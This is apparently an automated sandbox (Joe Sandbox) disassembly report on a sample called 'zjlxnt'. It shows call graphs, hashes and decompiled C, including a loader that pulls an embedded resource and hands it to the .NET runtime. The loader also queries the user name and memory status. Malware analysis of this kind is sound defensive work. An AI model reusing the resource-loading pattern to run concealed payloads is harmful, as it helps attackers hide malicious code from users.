___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler ___scrt_release_startup_lock 30813->30823 30858 401c83 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _com_raise_error 30814->30858 30816 401887 30859 40506f 21 API calls __InternalCxxFrameHandler 30816->30859 30818 40188d 30860 405033 21 API calls __InternalCxxFrameHandler 30818->30860 30820 401895 30821 401776 30823->30821 30826 4017f7 30823->30826 30857 405049 41 API calls 2 library calls 30823->30857 30825 4017fd 30851 40147b GetModuleHandleW FindResourceW 30825->30851 30847 401d9e 30826->30847 30837 40199b 30836->30837 30861 40207b IsProcessorFeaturePresent 30837->30861 30839 4019a7 30862 4025ca 10 API calls 2 library calls 30839->30862 30841 4019ac 30846 4019b0 30841->30846 30863 40563d 30841->30863 30843 4019c7 30843->30813 30846->30813 30922 402470 30847->30922 30849 401db1 GetStartupInfoW 30850 401dc4 30849->30850 30850->30825 30852 40149d GetModuleHandleW LoadResource 30851->30852 30853 4014de ExitProcess 30851->30853 30854 4014d7 FreeResource 30852->30854 30855 4014af LockResource GetModuleHandleW SizeofResource 30852->30855 30854->30853 30855->30854 30856 4014cc 30855->30856 30856->30854 30857->30826 30858->30816 30859->30818 30860->30820 30861->30839 30862->30841 30867 40870d 30863->30867 30866 4025e9 7 API calls 2 library calls 30866->30846 30868 40871d 30867->30868 30869 4019b9 30867->30869 30868->30869 30871 407a4c 30868->30871 30869->30843 30869->30866 30872 407a58 __FrameHandler3::FrameUnwindToState 30871->30872 30883 407596 EnterCriticalSection 30872->30883 30874 407a5f 30884 4076f1 30874->30884 30877 407a7d 30899 407aa3 LeaveCriticalSection __InternalCxxFrameHandler 30877->30899 30880 407a78 30898 40799c GetStdHandle GetFileType 30880->30898 30881 407a8e 30881->30868 30883->30874 30885 4076fd __FrameHandler3::FrameUnwindToState 30884->30885 30886 407706 30885->30886 30887 407727 30885->30887 30908 40649b 14 API calls __InternalCxxFrameHandler 30886->30908 30900 407596 EnterCriticalSection 30887->30900 30890 407733 30896 40775f 30890->30896 30901 407641 30890->30901 30891 40770b 30909 4062a0 41 API calls _com_raise_error 30891->30909 30895 407715 30895->30877 30897 4078e6 44 API calls 30895->30897 30910 407786 LeaveCriticalSection __InternalCxxFrameHandler 30896->30910 30897->30880 30898->30877 30899->30881 30900->30890 30911 4064ae 30901->30911 30903 407660 30919 40650b 14 API calls 2 library calls 30903->30919 30904 407653 30904->30903 30918 408562 6 API calls _com_raise_error 30904->30918 30906 4076b5 30906->30890 30908->30891 30909->30895 30910->30895 30916 4064bb _com_raise_error 30911->30916 30912 4064fb 30921 40649b 14 API calls __InternalCxxFrameHandler 30912->30921 30913 4064e6 RtlAllocateHeap 30914 4064f9 30913->30914 30913->30916 30914->30904 30916->30912 30916->30913 30920 4087b5 EnterCriticalSection LeaveCriticalSection _com_raise_error 30916->30920 30918->30904 30919->30906 30920->30916 30921->30914 30922->30849 30784 217f418 30785 217f479 GetUserNameW 30784->30785 30787 217f565 30785->30787 30788 53fb190 30791 53fb1b9 30788->30791 30789 53fb19e 30792 53fb1d5 30791->30792 30793 53fb1fd 30791->30793 30792->30789 30794 53fb21e 30793->30794 30795 53fb2e6 GlobalMemoryStatusEx 30793->30795 30794->30789 30796 53fb316 30795->30796 30796->30789 30923 2170448 30924 217044d 30923->30924 30925 217048f 30924->30925 30928 5212541 30924->30928 30932 5212550 30924->30932 30929 5212544 30928->30929 30936 5211f8c 30929->30936 30933 5212551 30932->30933 30934 5211f8c KiUserCallbackDispatcher 30933->30934 30935 5212580 30934->30935 30935->30924 30937 5211f97 30936->30937 30938 52147e4 KiUserCallbackDispatcher 30937->30938 30939 5214c0e 30938->30939 30939->30939 30940 2172a48 30941 2172a52 30940->30941 30944 217223c 30941->30944 30943 2172a9d 30945 2174568 LoadLibraryA 30944->30945 30947 2174661 30945->30947

                                                          Control-flow Graph

                                                          C-Code - Quality: 100%
                                                          			E0040147B() {
                                                          				void* _v8;
                                                          				struct HRSRC__* _t4;
                                                          				long _t10;
                                                          				struct HRSRC__* _t12;
                                                          				void* _t16;
                                                          
                                                          				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                                                          				_t12 = _t4;
                                                          				if(_t12 == 0) {
                                                          					L6:
                                                          					ExitProcess(0);
                                                          				}
                                                          				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                                                          				if(_t16 != 0) {
                                                          					_v8 = LockResource(_t16);
                                                          					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                                                          					_t13 = _v8;
                                                          					if(_v8 != 0 && _t10 != 0) {
                                                          						L00401000(_t13, _t10); // executed
                                                          					}
                                                          				}
                                                          				FreeResource(_t16);
                                                          				goto L6;
                                                          			}








                                                          0x00401491
                                                          0x00401497
                                                          0x0040149b
                                                          0x004014de
                                                          0x004014e0
                                                          0x004014e0
                                                          0x004014a9
                                                          0x004014ad
                                                          0x004014b9
                                                          0x004014bf
                                                          0x004014c5
                                                          0x004014ca
                                                          0x004014d2
                                                          0x004014d2
                                                          0x004014ca
                                                          0x004014d8
                                                          0x00000000

                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040148E
                                                          • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 00401491
                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014A0
                                                          • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014A3
                                                          • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014B0
                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014BC
                                                          • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014BF
                                                            • Part of subcall function 0040147B: CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                                                          • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014D8
                                                          • ExitProcess.KERNEL32 ref: 004014E0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                                          • String ID: v4.0.30319
                                                          • API String ID: 2372384083-3152434051
                                                          • Opcode ID: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                                                          • Instruction ID: 1025187115c16df301aa5e6fb14f5cc9936e15f8599d421e9e42fb84dc5f9529
                                                          • Opcode Fuzzy Hash: e46176bf33edfd7360af789f5c5b3a087a38c03d6e498ff32b619ddbb1b13555
                                                          • Instruction Fuzzy Hash: D4F04470A0131477EB202BF34D4DF2B755C9F85746F040874F601BA2A0CAB4DC008679
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 674 217f418-217f477 675 217f4e2-217f4e6 674->675 676 217f479-217f4a4 674->676 677 217f511-217f51c 675->677 678 217f4e8-217f50b 675->678 682 217f4a6-217f4a8 676->682 683 217f4d4 676->683 680 217f51e-217f526 677->680 681 217f528-217f563 GetUserNameW 677->681 678->677 680->681 684 217f565-217f56b 681->684 685 217f56c-217f582 681->685 687 217f4ca-217f4d2 682->687 688 217f4aa-217f4b4 682->688 695 217f4d9-217f4dc 683->695 684->685 689 217f584-217f590 685->689 690 217f598-217f5bf 685->690 687->695 692 217f4b6 688->692 693 217f4b8-217f4c6 688->693 689->690 699 217f5c1-217f5c5 690->699 700 217f5cf 690->700 692->693 693->693 697 217f4c8 693->697 695->675 697->687 699->700 701 217f5c7 699->701 702 217f5d0 700->702 701->700 702->702
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 0217F553
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.575759211.0000000002170000.00000040.00000800.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_2170000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: 23c08ddc1d2dad30d561672d26d837d8330c1e279c53d27154890c7ccf60d8ad
                                                          • Instruction ID: c62a8102ccf93998184ec70546426c00928cf75a10eaa230346ef26333ab15c7
                                                          • Opcode Fuzzy Hash: 23c08ddc1d2dad30d561672d26d837d8330c1e279c53d27154890c7ccf60d8ad
                                                          • Instruction Fuzzy Hash: 2E5105B1D002188FDB14CFA9C895B9EFBB1BF88314F158129E816BB751D778A845CF91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1424 401e16-401e21 SetUnhandledExceptionFilter
                                                          C-Code - Quality: 100%
                                                          			E00401E16() {
                                                          				_Unknown_base(*)()* _t1;
                                                          
                                                          				_t1 = SetUnhandledExceptionFilter(E00401E22); // executed
                                                          				return _t1;
                                                          			}




                                                          0x00401e1b
                                                          0x00401e21

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E22,0040170D), ref: 00401E1B
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                                                          • Instruction ID: 1700cd800284021a96fa1165edcf07aa52b884b6f150888f85792e917e9d8571
                                                          • Opcode Fuzzy Hash: 7cc42e0c232be2002621d7aac29e4c4a89884d8af04e1807cbd6d37abe40dfe2
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 052136B8
                                                          • GetCurrentThread.KERNEL32 ref: 052136F5
                                                          • GetCurrentProcess.KERNEL32 ref: 05213732
                                                          • GetCurrentThreadId.KERNEL32 ref: 0521378B
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.576919404.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_5210000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: e9bd5c5f33138a5a072bfb978a88c91f7425740753204fabd4a3e481db0b21a3
                                                          • Instruction ID: a30aeca86923cf323750dd83d18e5384c54160391f789cbc0a8ce697a70c3c94
                                                          • Opcode Fuzzy Hash: e9bd5c5f33138a5a072bfb978a88c91f7425740753204fabd4a3e481db0b21a3
                                                          • Instruction Fuzzy Hash: 5B5153B09113898FDB10DFAAD68879EBFF1BF58314F24886AE409A7350D7749844CB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 052136B8
                                                          • GetCurrentThread.KERNEL32 ref: 052136F5
                                                          • GetCurrentProcess.KERNEL32 ref: 05213732
                                                          • GetCurrentThreadId.KERNEL32 ref: 0521378B
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.576919404.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_5210000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: 97ed396b240ed6781f12f7f90b6a01220f05698538e6fbd01fd285eba17c939a
                                                          • Instruction ID: 91ed9524665fab23972de545260aaa44c415d78e5977c51fcdad3adcc9786f4b
                                                          • Opcode Fuzzy Hash: 97ed396b240ed6781f12f7f90b6a01220f05698538e6fbd01fd285eba17c939a
                                                          • Instruction Fuzzy Hash: 6A5144B09103498FDB10DFAAD688B9EBFF1BF58314F208469E419A7350D7746844CF69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 644 217f40c-217f477 646 217f4e2-217f4e6 644->646 647 217f479-217f4a4 644->647 648 217f511-217f51c 646->648 649 217f4e8-217f50b 646->649 653 217f4a6-217f4a8 647->653 654 217f4d4 647->654 651 217f51e-217f526 648->651 652 217f528-217f563 GetUserNameW 648->652 649->648 651->652 655 217f565-217f56b 652->655 656 217f56c-217f582 652->656 658 217f4ca-217f4d2 653->658 659 217f4aa-217f4b4 653->659 666 217f4d9-217f4dc 654->666 655->656 660 217f584-217f590 656->660 661 217f598-217f5bf 656->661 658->666 663 217f4b6 659->663 664 217f4b8-217f4c6 659->664 660->661 670 217f5c1-217f5c5 661->670 671 217f5cf 661->671 663->664 664->664 668 217f4c8 664->668 666->646 668->658 670->671 672 217f5c7 670->672 673 217f5d0 671->673 672->671 673->673
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,00000000), ref: 0217F553
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.575759211.0000000002170000.00000040.00000800.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_2170000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: 7686481630510de748855ca9ab24e98708ebd3b5a4e35a2c610c03dfeb2c861f
                                                          • Instruction ID: 73a16aee1b01631571235a386d78e651a5c3abf905567235e1d8f7cf6047ead9
                                                          • Opcode Fuzzy Hash: 7686481630510de748855ca9ab24e98708ebd3b5a4e35a2c610c03dfeb2c861f
                                                          • Instruction Fuzzy Hash: A35104B0D002188FDB14CFA9C894B9EFBB1BF88304F14812AE816AB751D774A841CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 703 53fb1b9-53fb1d3 704 53fb1fd-53fb21c call 53f9ef0 703->704 705 53fb1d5-53fb1fc call 53f9ee4 703->705 711 53fb21e-53fb221 704->711 712 53fb222-53fb281 704->712 718 53fb287-53fb314 GlobalMemoryStatusEx 712->718 719 53fb283-53fb286 712->719 722 53fb31d-53fb345 718->722 723 53fb316-53fb31c 718->723 723->722
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.576985695.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_53f0000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 267a4c2a40483c1f32512e4c5266b55f4e872e9fa5fd659a668dab4c28b3618d
                                                          • Instruction ID: ef5e333caf624f68a41f146639f17997e3f68149b35f11b17281579682aed1b4
                                                          • Opcode Fuzzy Hash: 267a4c2a40483c1f32512e4c5266b55f4e872e9fa5fd659a668dab4c28b3618d
                                                          • Instruction Fuzzy Hash: FC41E172E043858FCB00CBB9C8147AEBFF1AF89210F19856BD544E7642DB789845CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 726 217223c-21745bf 728 2174613-217465f LoadLibraryA 726->728 729 21745c1-21745e6 726->729 732 2174661-2174667 728->732 733 2174668-2174699 728->733 729->728 734 21745e8-21745ea 729->734 732->733 739 217469b-217469f 733->739 740 21746a9 733->740 736 217460d-2174610 734->736 737 21745ec-21745f6 734->737 736->728 741 21745fa-2174609 737->741 742 21745f8 737->742 739->740 743 21746a1 739->743 745 21746aa 740->745 741->741 744 217460b 741->744 742->741 743->740 744->736 745->745
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?), ref: 0217464F
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.575759211.0000000002170000.00000040.00000800.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_2170000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 5d20b7acfa078a813ff907147ac58960902028fa9d67f782b8afd99af2b20c87
                                                          • Instruction ID: 5356fa174b95aeb9202f4cc4996427252e80b8e23b51ab2fa2f99e68f926ea09
                                                          • Opcode Fuzzy Hash: 5d20b7acfa078a813ff907147ac58960902028fa9d67f782b8afd99af2b20c87
                                                          • Instruction Fuzzy Hash: BD4137B0E406588FDB10CFA9C984B9EBBF5EF88304F148529E815EB344D778A845CF92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 746 217455c-21745bf 748 2174613-217465f LoadLibraryA 746->748 749 21745c1-21745e6 746->749 752 2174661-2174667 748->752 753 2174668-2174699 748->753 749->748 754 21745e8-21745ea 749->754 752->753 759 217469b-217469f 753->759 760 21746a9 753->760 756 217460d-2174610 754->756 757 21745ec-21745f6 754->757 756->748 761 21745fa-2174609 757->761 762 21745f8 757->762 759->760 763 21746a1 759->763 765 21746aa 760->765 761->761 764 217460b 761->764 762->761 763->760 764->756 765->765
                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(?), ref: 0217464F
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.575759211.0000000002170000.00000040.00000800.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_2170000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: c2287a4b5eb66193a3eafa386a83c2e390e868ec678418f41cddc03df5417fb9
                                                          • Instruction ID: 902e78d823411f7971590d431753af71005d9ed8f1f6ed111cfd464d704f1149
                                                          • Opcode Fuzzy Hash: c2287a4b5eb66193a3eafa386a83c2e390e868ec678418f41cddc03df5417fb9
                                                          • Instruction Fuzzy Hash: 954127B0D406589FDB10CFA9C984B9EBBF5FF88304F148529E815AB354D774A845CF92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1388 5213878-521387e 1389 5213880-5213884 1388->1389 1390 5213885-5213914 DuplicateHandle 1388->1390 1389->1390 1391 5213916-521391c 1390->1391 1392 521391d-521393a 1390->1392 1391->1392
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05213907
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.576919404.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_5210000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: cc28b6c411383a3c4d04ffa9384a20c0bc33c3f368eebe2a57b69a197eebe26d
                                                          • Instruction ID: 1ddf228aa65ec793bdac3ecd19c12dfb9cec102a4a66b6f701420cefa988f3e2
                                                          • Opcode Fuzzy Hash: cc28b6c411383a3c4d04ffa9384a20c0bc33c3f368eebe2a57b69a197eebe26d
                                                          • Instruction Fuzzy Hash: 7A21F4B5D002499FDB10CFAAD984ADEBFF5FF58310F14841AE919A3210D374A944CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1395 5213880-5213914 DuplicateHandle 1397 5213916-521391c 1395->1397 1398 521391d-521393a 1395->1398 1397->1398
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05213907
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.576919404.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_5210000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 5ea7ed538844fd7ce152acf06edb715d1c3ee83428b4b33d684fe26355fa1e71
                                                          • Instruction ID: dadb9768857398a42db5318f71846e0132e95e0e8c99784916dc16630591181f
                                                          • Opcode Fuzzy Hash: 5ea7ed538844fd7ce152acf06edb715d1c3ee83428b4b33d684fe26355fa1e71
                                                          • Instruction Fuzzy Hash: 4A21E3B5D002099FDB10CFAAD584ADEBFF8FB48310F14841AE919A7210D374A944CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1401 521a901-521a95c 1403 521a9aa-521a9c3 1401->1403 1404 521a95e-521a986 KiUserCallbackDispatcher 1401->1404 1405 521a988-521a98e 1404->1405 1406 521a98f-521a9a3 1404->1406 1405->1406 1406->1403
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0521A975
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.576919404.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_5210000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 8afcbbb834b6018b7d8e83b3f04cc8410b1fb0ce40f6ddf93983c652deec1fe1
                                                          • Instruction ID: 49d7b6bb2fea9ccb0b5cfd0f1084207a5ebc36ea73d7356fe9ca606a0cf4d8c5
                                                          • Opcode Fuzzy Hash: 8afcbbb834b6018b7d8e83b3f04cc8410b1fb0ce40f6ddf93983c652deec1fe1
                                                          • Instruction Fuzzy Hash: 7F11DC71804799CEDB00CF69D0483AEBFF4EB14314F14445AD98AA7681C7389A44DFA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1408 4064ae-4064b9 1409 4064c7-4064cd 1408->1409 1410 4064bb-4064c5 1408->1410 1412 4064e6-4064f7 RtlAllocateHeap 1409->1412 1413 4064cf-4064d0 1409->1413 1410->1409 1411 4064fb-406506 call 40649b 1410->1411 1418 406508-40650a 1411->1418 1414 4064d2-4064d9 call 4051c4 1412->1414 1415 4064f9 1412->1415 1413->1412 1414->1411 1421 4064db-4064e4 call 4087b5 1414->1421 1415->1418 1421->1411 1421->1412
                                                          C-Code - Quality: 100%
                                                          			E004064AE(signed int _a4, signed int _a8) {
                                                          				void* _t8;
                                                          				void* _t12;
                                                          				signed int _t13;
                                                          				signed int _t18;
                                                          				long _t19;
                                                          
                                                          				_t18 = _a4;
                                                          				if(_t18 == 0) {
                                                          					L2:
                                                          					_t19 = _t18 * _a8;
                                                          					if(_t19 == 0) {
                                                          						_t19 = _t19 + 1;
                                                          					}
                                                          					while(1) {
                                                          						_t8 = RtlAllocateHeap( *0x4163ec, 8, _t19); // executed
                                                          						if(_t8 != 0) {
                                                          							break;
                                                          						}
                                                          						__eflags = E004051C4();
                                                          						if(__eflags == 0) {
                                                          							L8:
                                                          							 *((intOrPtr*)(E0040649B())) = 0xc;
                                                          							__eflags = 0;
                                                          							return 0;
                                                          						}
                                                          						_t12 = E004087B5(__eflags, _t19);
                                                          						__eflags = _t12;
                                                          						if(_t12 == 0) {
                                                          							goto L8;
                                                          						}
                                                          					}
                                                          					return _t8;
                                                          				}
                                                          				_t13 = 0xffffffe0;
                                                          				if(_t13 / _t18 < _a8) {
                                                          					goto L8;
                                                          				}
                                                          				goto L2;
                                                          			}








                                                          0x004064b4
                                                          0x004064b9
                                                          0x004064c7
                                                          0x004064c7
                                                          0x004064cd
                                                          0x004064cf
                                                          0x004064cf
                                                          0x004064e6
                                                          0x004064ef
                                                          0x004064f7
                                                          0x00000000
                                                          0x00000000
                                                          0x004064d7
                                                          0x004064d9
                                                          0x004064fb
                                                          0x00406500
                                                          0x00406506
                                                          0x00000000
                                                          0x00406506
                                                          0x004064dc
                                                          0x004064e2
                                                          0x004064e4
                                                          0x00000000
                                                          0x00000000
                                                          0x004064e4
                                                          0x00000000
                                                          0x004064e6
                                                          0x004064bf
                                                          0x004064c5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,?,?,00405F2E,00000001,00000364,?,00000007,000000FF,?,?,004064A0,004050A7,?,00401668), ref: 004064EF
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 8f646ef87f97bce7b3fbb940021f70ed9acc1b429a1aae06431b718667ad30f8
                                                          • Instruction ID: 3efc618f0b7f40eca7bec11a0985368c4a4d2247eacbb5d5b70fa3bd5a8b9347
                                                          • Opcode Fuzzy Hash: 8f646ef87f97bce7b3fbb940021f70ed9acc1b429a1aae06431b718667ad30f8
                                                          • Instruction Fuzzy Hash: F6F0B43160852466DB219F22DD05B5B3758DB81770B17853BAC5ABA2C0CA78E82196AC
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.572433710.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_80d000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 430b267560ace8634200c4737a8162d8867d4abbca3c8f97648385b329251382
                                                          • Instruction ID: d73ddf851885d9674128e59f4b51e1a335d1ac09a7b9d52f92a351d410a8f953
                                                          • Opcode Fuzzy Hash: 430b267560ace8634200c4737a8162d8867d4abbca3c8f97648385b329251382
                                                          • Instruction Fuzzy Hash: 6F21F1B1504344DFDB45CF94DDC0B26BF65FBA8324F248569E8098B28AC337D846DAE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.575270277.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_81d000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c189a9f630d8927ee5d7ac7524719c9629905c82ca800f74ef1ecf83f55b36e
                                                          • Instruction ID: 8e7bee95d1376447e93d498793ea43583e554d2fa87f573768bcf11571651e49
                                                          • Opcode Fuzzy Hash: 1c189a9f630d8927ee5d7ac7524719c9629905c82ca800f74ef1ecf83f55b36e
                                                          • Instruction Fuzzy Hash: C321F275604744DFDB14CF24D9C0B56BBA9FF88318F20C9ADD8098B246C33AD887CA61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.572433710.000000000080D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0080D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_80d000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 628f81c0362d5925aab3f55531432407054e550311c049ee34e407e7a040c28b
                                                          • Instruction ID: 757e18bea207c573cce0bde5493840841ed406bea15a578b55520df7a973a34e
                                                          • Opcode Fuzzy Hash: 628f81c0362d5925aab3f55531432407054e550311c049ee34e407e7a040c28b
                                                          • Instruction Fuzzy Hash: 6B11B176504380CFDB12CF54D9C4B16BF61FB94324F24C6A9D8494B256C336D856CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.575270277.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_81d000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 11cbba222367c8e85e9375d7dc525814446406936fb8d5dff04b2d939095f0b5
                                                          • Instruction ID: 806c288dc6e99e239e75252a681c5a97e20e5879ca4118849a40fbdf7613959e
                                                          • Opcode Fuzzy Hash: 11cbba222367c8e85e9375d7dc525814446406936fb8d5dff04b2d939095f0b5
